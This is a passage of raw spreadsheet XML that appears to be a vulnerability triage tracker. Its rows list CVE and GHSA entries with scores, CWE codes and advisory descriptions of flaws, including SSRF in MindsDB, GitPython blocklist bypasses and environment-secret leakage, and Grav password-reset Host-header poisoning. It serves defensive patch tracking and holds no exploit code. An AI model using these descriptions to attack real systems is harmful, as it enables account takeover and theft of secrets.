      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85786</t>
        </is>
      </c>
      <c r="D495" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F495" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr"/>
      <c r="Q495" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R495" s="5" t="inlineStr">
        <is>
          <t>Improper handling of highly compressed data in Amazon ion-java before 1.12.1 might allow remote attackers to cause a denial of service via a crafted compressed Ion document that expands to an arbitrarily large size upon decompression due to insufficient coverage of the GZIP auto-decompression opt-out introduced for CVE-2026-75936.
To remediate this issue, users should upgrade to version 1.12.1.</t>
        </is>
      </c>
      <c r="S495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85786</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86173</t>
        </is>
      </c>
      <c r="D496" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F496" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr"/>
      <c r="Q496" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R496" s="5" t="inlineStr">
        <is>
          <t>MindsDB through 26.1.0 contains a server-side request forgery vulnerability in the web crawler handler that allows unauthenticated attackers to fetch arbitrary URLs by supplying caller-controlled URLs to CrawlerTable.list. Attackers can bypass the allowlist control by exploiting the default empty configuration and access internal services and cloud metadata endpoints without authentication.</t>
        </is>
      </c>
      <c r="S496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86173</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86177</t>
        </is>
      </c>
      <c r="D497" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F497" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr"/>
      <c r="Q497" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R497" s="5" t="inlineStr">
        <is>
          <t>Pterodactyl Panel before 1.14.1 fails to validate action-specific permissions in scheduled task creation, allowing subusers with only schedule.update permission to execute arbitrary console commands. Attackers can create and immediately trigger scheduled tasks that run game-server console commands, control server power state, or create backups without proper authorization checks.</t>
        </is>
      </c>
      <c r="S497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86177</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86193</t>
        </is>
      </c>
      <c r="D498" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F498" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr"/>
      <c r="Q498" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R498" s="5" t="inlineStr">
        <is>
          <t>grav-plugin-api before 1.0.20 fails to validate group-inherited super permissions in user-management guards, allowing non-super user managers to modify super-admin accounts. Attackers with api.access and api.users.write can patch password fields on group-super accounts to gain full administrative control.</t>
        </is>
      </c>
      <c r="S498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86193</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86195</t>
        </is>
      </c>
      <c r="D499" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F499" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr"/>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr"/>
      <c r="Q499" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R499" s="5" t="inlineStr">
        <is>
          <t>grav-plugi</t>
        </is>
      </c>
      <c r="S499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86195</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86196</t>
        </is>
      </c>
      <c r="D500" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F500" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr"/>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr"/>
      <c r="Q500" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R500" s="5" t="inlineStr">
        <is>
          <t>Grav API plugin versions before 1.0.20 build password reset links from the untrusted Host header in the forgot-password endpoint, allowing unauthenticated attackers to redirect reset tokens to attacker-controlled domains. Attackers can send password reset requests for any account with a malicious Host header, intercept the reset token from victim emails, and complete account takeover including super-admin accounts.</t>
        </is>
      </c>
      <c r="S500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86196</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86727</t>
        </is>
      </c>
      <c r="D501" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F501" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr"/>
      <c r="Q501" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R501"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S501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86727</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86732</t>
        </is>
      </c>
      <c r="D502" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F502" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr"/>
      <c r="Q502" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R502"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S502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86732</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86738</t>
        </is>
      </c>
      <c r="D503" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr"/>
      <c r="Q503" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R503" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 contain a CSS injection vulnerability in the Custom CSS field due to incomplete sanitization that reverses HTML encoding on greater-than and double-quote characters. Superusers can plant malicious CSS payloads using @import and url() references to exfiltrate CSRF tokens from other superusers via attribute-selector rules, enabling account takeover.</t>
        </is>
      </c>
      <c r="S503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86738</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>GHSA-2rrw-hpqm-36pv</t>
        </is>
      </c>
      <c r="D504" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F504" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="inlineStr"/>
      <c r="I504" s="5" t="inlineStr"/>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr"/>
      <c r="L504" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr"/>
      <c r="P504" s="5" t="inlineStr"/>
      <c r="Q504" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R504" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-rrv8-h7p8-rx55. This link is maintained to preserve external references.
## Original Description
NLTK versions before 3.10.0 contain a regular expression denial of service vulnerability in Text.findall() and TokenSearcher.findall() methods that accept user-supplied regular expressions without validation or timeout. Attackers can supply crafted regex patterns that cause catastrophic backtracking, resulting in indefinite CPU saturation and denial of service to all users of the Python process.</t>
        </is>
      </c>
      <c r="S504" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-2rrw-hpqm-36pv</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>GHSA-6r2r-ww24-7h52</t>
        </is>
      </c>
      <c r="D505" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F505" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="inlineStr"/>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr">
        <is>
          <t>pip:gitpython</t>
        </is>
      </c>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr"/>
      <c r="P505" s="5" t="inlineStr"/>
      <c r="Q505" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R505" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-2f96-g7mh-g2hx. This link is maintained to preserve external references.
## Original Description
GitPython before 3.1.51 contains an incomplete command injection blocklist that fails to account for git's long-option prefix abbreviation feature. Attackers can bypass the unsafe options guard by using abbreviated option names like upload_p instead of upload_pack, which git resolves to dangerous options and executes arbitrary commands.</t>
        </is>
      </c>
      <c r="S505" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-6r2r-ww24-7h52</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>GHSA-7r39-6q8m-qw68</t>
        </is>
      </c>
      <c r="D506" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F506" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="inlineStr"/>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr">
        <is>
          <t>pip:gitpython</t>
        </is>
      </c>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr"/>
      <c r="P506" s="5" t="inlineStr"/>
      <c r="Q506" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R506" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-8mcc-hrx5-hvxc. This link is maintained to preserve external references.
## Original Description
GitPython before 3.1.59 omits --separate-git-dir from unsafe_git_clone_options, allowing attackers to create arbitrary git directories outside the intended clone destination. Attackers can pass a separate_git_dir parameter to Repo.clone_from() or Repo.clone() to redirect repository metadata to an attacker-controlled filesystem path, enabling arbitrary directory creation and potential hook execution.</t>
        </is>
      </c>
      <c r="S506" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-7r39-6q8m-qw68</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>GHSA-j95f-988m-3j2f</t>
        </is>
      </c>
      <c r="D507" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F507" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="inlineStr"/>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr">
        <is>
          <t>npm:@tiptap/core</t>
        </is>
      </c>
      <c r="M507" s="5" t="inlineStr">
        <is>
          <t>3.30.5</t>
        </is>
      </c>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr"/>
      <c r="P507" s="5" t="inlineStr"/>
      <c r="Q507" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-1333</t>
        </is>
      </c>
      <c r="R507" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S507" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-j95f-988m-3j2f</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>GHSA-m4f3-g4cq-hqrx</t>
        </is>
      </c>
      <c r="D508" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F508" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="inlineStr"/>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr">
        <is>
          <t>pip:gitpython</t>
        </is>
      </c>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr"/>
      <c r="P508" s="5" t="inlineStr"/>
      <c r="Q508" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R508" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-rwj8-pgh3-r573. This link is maintained to preserve external references.
## Original Description
GitPython before 3.1.52 is vulnerable to environment-variable exfiltration in Repo.clone_from(). The caller-supplied remote URL is passed through Git.polish_url(), which on non-Cygwin platforms calls os.path.expandvars() on the URL before invoking git clone. An attacker who controls the clone URL can embed $NAME or ${NAME} tokens that are expanded to the values of the hosting process's environment variables (e.g., AWS_SECRET_ACCESS_KEY or GITHUB_TOKEN). The resulting URL, now containing the secret, is transmitted over the network to an attacker-controlled host during the clone attempt, disclosing the secret.</t>
        </is>
      </c>
      <c r="S508" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-m4f3-g4cq-hqrx</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>GHSA-wv46-xpj8-pw53</t>
        </is>
      </c>
      <c r="D509" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F509" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="inlineStr"/>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr"/>
      <c r="L509" s="5" t="inlineStr">
        <is>
          <t>pip:gitpython</t>
        </is>
      </c>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr"/>
      <c r="P509" s="5" t="inlineStr"/>
      <c r="Q509" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R509" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-wvpp-8hx9-p66j. This link is maintained to preserve external references.
## Original Description
GitPython before 3.1.58 contains a command execution vulnerability in the check_unsafe_options guard that can be bypassed by combining a single-character kwarg with split_single_char_options=False. Attackers can supply a crafted kwargs dictionary to guarded methods like clone_from to emit a joined token parsed as --upload-pack, enabling arbitrary OS command execution at default allow_unsafe_options=False.</t>
        </is>
      </c>
      <c r="S509" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-wv46-xpj8-pw53</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-35585</t>
        </is>
      </c>
      <c r="D510" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F510" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr"/>
      <c r="Q510" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R510" s="5" t="inlineStr">
        <is>
          <t>Oxford Nanopore MinKNOW before 24.06 relies on a client's source IP address for authentication.</t>
        </is>
      </c>
      <c r="S510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-35585</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34223</t>
        </is>
      </c>
      <c r="D511" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F511" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr"/>
      <c r="Q511" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R511" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Desigo CC ClickOnce Client V6 (All versions), Desigo CC ClickOnce Client V7 (All versions), Desigo CC family V8 (All versions), Desigo CC family V9 (All versions), Desigo CC Flex Client V6 (All versions), Desigo CC Flex Client V7 (All versions), Desigo CC Installed Client V6 (All versions), Desigo CC Installed Client V7 (All versions). The affected application is vulnerable to Client Code Execution (CCE) due to insufficient input validation when handling scripts embedded within user-defined graphics documents.  Specifically, when the script within a graphics document is designed or modified by an attacker to include malicious commands.  When a user opens a compromised graphics document, the embedded script is executed on the client application instance, allowing an attacker to write arbitrary files to the client's operating system. Successful exploitation requires an attacker to craft a malicious graphics document and entice a user with sufficient privileges to display it.  This could lead to compromise of the client operating system and potential lateral movement within the organization.</t>
        </is>
      </c>
